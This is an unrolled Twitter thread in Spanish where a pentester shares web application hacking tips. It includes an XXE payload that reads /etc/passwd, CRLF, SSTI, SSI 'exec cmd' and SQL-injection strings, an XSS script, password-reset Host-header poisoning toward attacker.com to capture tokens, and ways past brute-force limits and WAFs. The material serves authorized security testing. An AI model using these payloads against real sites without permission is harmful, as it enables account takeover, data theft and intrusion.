Vamos a jugar a un juego.
Por cada RT que tenga este Tweet doy un tip sobre pentesting web. :D
Cuando estamos frente a una api (dominio.com/api/v2/path) es más fácil buscar vulnerabilidades si intentamos pentestear una versión antigua (dominio.com/api/v1/path)
Podemos llegar a bypasear filtros cuando intentamos explotar un Open Redirect si usamos caracteres del alfabeto cirilico, a este ataque se le llama IDN homograph. irongeek.com/homoglyph-atta…
En la página de registro podemos conseguir acceso a una cuenta ya existente añadiendo un espacio al final del correo electrónico.
Otras formas serían escribiendo el correo electrónico en mayúscula o añadiendo %00 al final del mail.
Podemos bypasear una detección de fuerza bruta con las cabeceras X-Forwarder-For y Origirin.
X-Forwarder-For: 127.0.0.1
Origin: 127.0.0.1
En ocasiones es posible bypasear un 403 con Race Condition. Para eso podemos crear un intruder en BurpSuite con 50 hilos.
Cuando veamos que una página web está generando un documentos podemos probar a realizar una XXE.
Si no se está enviando el XML completo podemos hacerlo con esta sintaxis.
<foo xmlns:xi="w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Cuando tenemos un Open Redirect podemos conseguir un CRLF de las siguientes formas:

- %0d%0aheader:header
- %0aheader:header
- %0dheader:header
- %23%0dheader:header
- %3f%0dheader:header
- /%250aheader:header
- /%25250aheader:header
- /%%0a0aheader:header
- /%3f%0dheader:header
En algunas ocasiones es posible bypasear un CSRF cambiando la petición de POST a GET o viceversa.
Una forma de conseguir un perfil administrador en una página web es registrándote con un email de sudominio.
pentester@dominio.com
En caso de que se esté generando un documento y no acepte un XML podemos intentar un Server Side XSS Injection. Si queréis saber más como funciona el tema podéis leer esto: whateversec.com/2021/01/blind-…
Cuando una web nos da la posibilidad de registrarnos desde un lugar externo (Facebook, Google, etc...) podemos probar a usar uno de estos servicios y luego cambiar la contraseña al usuario desde el panel de registro. Puede que el servidor no detecte el mail como ya registrado.
Cuando creamos un usuario podemos probar a nombrarlo admin' OR '1'='1, puede que nos cree el usuario como administrador.
Siempre que tengamos un SSRF es importante comprobar si también es vulnerable a RCE. Podemos hacerlo con Burp Collaborator de la siguiente forma:
- dominio.com/?url=http%3A%2…
Otro Bypass de CSRF es enviar el parámetro vacío o simplemente no enviarlo.
En los mismo sitios donde intentarías explotar una XSS puedes intentar explotar una SSTI, yo pruebo siempre los siguientes Payloads:
- }}{{3*3}}
- {{7*7}}
- ${7*7}
- @(1+2)
- #{1+1}
- {% debug %}
- <%= 3 * 3 %>
En algunas ocasiones podemos conseguir un IDOR poniendo el parámetro dos veces.
dominio.com/messages?user_…
Cuando hacemos Logout podemos buscar si existe un parametro para explotar Open Redirect. Yo pruebo estos:
- url
- return_url
- return_to
- redir
- redirect
- next
Cuando le damos al boton de recuperar contraseña podemos probar a inyectar las siguientes cabeceras:
- Host: attacker.com
- X-Forwarder-For: https://t.co/M4CtwU1HQz
Puede que el link que se envía apunte a nuestro dominio y cuando entre la víctima obtemos el Token.
Cuando el servidor está generando un PDF (contratos o similares) es importante recuperar sus metadatos con Exiftool, puede que tenga vulnerabilidades importantes conocidas.
Cuando estamos creando algún tipo de campo podemos utilizar el BurpSuite para hacer un Race Condition creando el campo con el Intruder y 50 hilos. En ocasiones el servidor Crashea y muestra información interesante.
Cuando estamos frente a un servidor IIS podemos probar si es vulnerable a iis_ShortName.
- dominio[.]com/valid*~1.*\.asp
- dominio[.]com/invalid*~1.*\.asp
Si la respuesta es diferente a través de booleanización se pueden listar directorios.
github.com/irsdl/IIS-Shor…
Hay una extensión en BurpSuite llamada "BrokenLinkHijacking" que nos dice cuando un contendio que se está cargando da 404, en ocasiones es posible ownear el subdominio que se carga e introducir nuestro propio contenido.
En los formularios de contacto podemos probar a explotar Blind XSS. Yo uso xsshunter.com/app, en caso de que sea vulnerable y a un administrador se le ejecute nuestro código nos avisará a través de la aplicación.
Podemos conseguir bypasear un campo de contraseña u otras verificaciones similares enviándolo como un Array o simplemente borrando el campo.
/login?user=admin&pass[]=test
/login?user=admin
Cuando estamos auditando una API, si no conseguimos explotar un IDOR podemos probar con otros parámetros que conozcamos (fijandonos en el JSON de la respuesta).
/api/v2/profile?user_id=3000 - 403
/api/v2/profile?mail=admin%40dominio[.]com - 200
Una forma de explotar Stored XSS cuando estamos frente a un MSSQL es usar unos caracteres muy parecidos a "<" ">" que la base de datos no comprende y los transforma en los que queremos.
"><script>alert(0)</script>
Cuando nos estamos enfrentando a un WAF, es interesante buscar en Shodan el dominio que estamos auditando y acceder directamente desde su IP pública sin pasar por el WAF, así podremos mandar los payloads que queramos.
Si tenemos una XSS podemos probar si el servidor es vulnerable a SSI, os dejo algunos Payloads:
<!--#exec cmd="ls" -->
<!--#exec cmd="dir" -->
<!--#include file="robots.txt"-->
Siempre que tengamos un SSRF debemos realizar una petición a nuestro servidor (o Burp Collaborator por defecto) y mirar las cabeceras, en muchas ocasiones podremos encontrar Cookies o Tokens de autorización.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Rolo Miján

Rolo Miján Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!